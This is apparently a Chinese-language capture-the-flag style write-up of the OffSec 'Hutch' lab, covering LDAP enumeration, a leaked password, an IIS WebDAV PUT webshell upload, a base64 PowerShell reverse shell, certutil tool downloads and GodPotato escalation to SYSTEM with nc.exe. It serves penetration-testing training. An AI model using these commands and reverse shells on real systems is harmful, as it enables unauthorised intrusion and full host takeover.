OSCP Hutch Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Hutch

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

LDAP 服务枚举用户描述信息 –> fmcsorley 用户密码 –> IIS PUT 写入 webshell(设置 Authorization 头) –> IIS 服务账号权限 –> 用户旗帜

权限提升:

土豆提权(GodPotato) –> system 权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
sudo nmap -p- 192.168.236.122 --min-rate=2000

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49668/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49692/tcp open  unknown
49768/tcp open  unknown

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49676,49692,49768 -sCV 192.168.236.122

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/10.0
|   Server Date: Sun, 07 Sep 2025 14:05:54 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-07 14:05:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49768/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-07T14:05:56
|_  start_date: N/A

系统为 Windows 域环境,开放有 HTTP、Kerberos、Winrm 等 Windows 默认服务,其中域控 host 为 HUTCHDC。

3.2 渗透测试突破边界

3.2.1 LDAP 枚举泄漏 fmcsorley 用户密码

在 kali 添加靶机域控域名解析。

1
echo "192.168.236.122\thutchdc.hutch.offsec hutch.offsec" | sudo tee -a /etc/hosts

通过 ldapsearch 工具枚举域控 ldap 服务,发现大量敏感信息。

1
ldapsearch -H ldap://hutch.offsec -x -s base namingcontexts

1
ldapsearch -H ldap://hutch.offsec -x -b 'DC=hutch,DC=offsec'

利用 ldapsearch 可以进一步枚举用户名、用户描述等信息,也可使用 nxc 工具模块枚举用户信息。

使用 nxc ldap 枚举用户,在 fmcsorley 用户描述信息发现默认密码。

1
nxc ldap hutch.offsec -u '' -p '' --users

也可利用 nxc ldap 模块查看用户信息,依然可得到用户密码信息。

1
nxc ldap hutch.offsec -u '' -p '' -M user-desc

1
2
fmcsorley
CrabSharkJellyfish192

3.2.2 IIS PUT 上传 Get shell

使用获取的用户进行 bloodhound 信息收集,未发现任何可利用路径。接下来尝试密码复用、AS-Rep 和 Kerberoastring 攻击也没有任何发现,nmap 的扫描结果得知靶机 IIS 服务允许 PUT 上传,可尝试利用。

1
2
OPTIONS / HTTP/1.1
Host: hutch.offsec

测试 PUT 上传文件时系统提示 401,搜索引擎检索:IIS 授权上传文件,发现可在请求头添加 Authorization 来设置用户凭证。

1
https://learn.microsoft.com/zh-cn/troubleshoot/developer/webapps/iis/www-modules-features/upload-to-webdav-directory-fails

将用户名和密码转换为 base64 格式并设置到请求头中,可成功上传了测试文件。

1
2
3
4
5
6
PUT /test.txt HTTP/1.1
Host: hutch.offsec
Authorization: Basic Zm1jc29ybGV5OkNyYWJTaGFya0plbGx5ZmlzaDE5Mg==
Content-Length: 3

123

PUT 上传写入 webshell。

1
2
# aspx web shell
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

访问上传的 webshell,测试可执行系统命令。

执行反弹 shell,获取到系统 IIS 服务账号权限。

1
2
# reverse shell
https://www.revshells.com/

1
2
rlwrap nc -lvnp 80
/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA2ACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 土豆提权(GodPotato)

Windows 服务账号一般具有 seImpersonatePrivilege 特权,该特权可使用土豆工具提权至 system 权限。

使用 whoami /priv 确定 IIS 服务账号存在 seImpersonatePrivilege 特权,且系统为 Server 2019 版本,安装有 .NET V4,可使用 GodPotato 提权至系统 system 权限。

1
whoami /priv

1
systeminfo

1
dir C:\windows\Microsoft.NET\Framework64

上传 GodPotato 和 nc 至靶机。

1
2
3
https://github.com/BeichenDream/GodPotato
certutil -urlcache -split -f http://192.168.45.236/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.236/nc.exe

执行反弹 shell,得到系统 system 权限。

1
2
rlwrap nc -lvnp 80
.\GodPotato-NET4.exe -cmd "cmd /c C:\users\public\nc.exe 192.168.45.236 80 -e cmd.exe"

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Windows #Windows GodPotato 工具使用 #LDAP 服务枚举 #IIS PUT Get Shell
OSCP Hutch Write-up
https://www.f0nesec.top/2025/09/08/oscp-hutch/
作者
F0ne
发布于
2025年9月8日
许可协议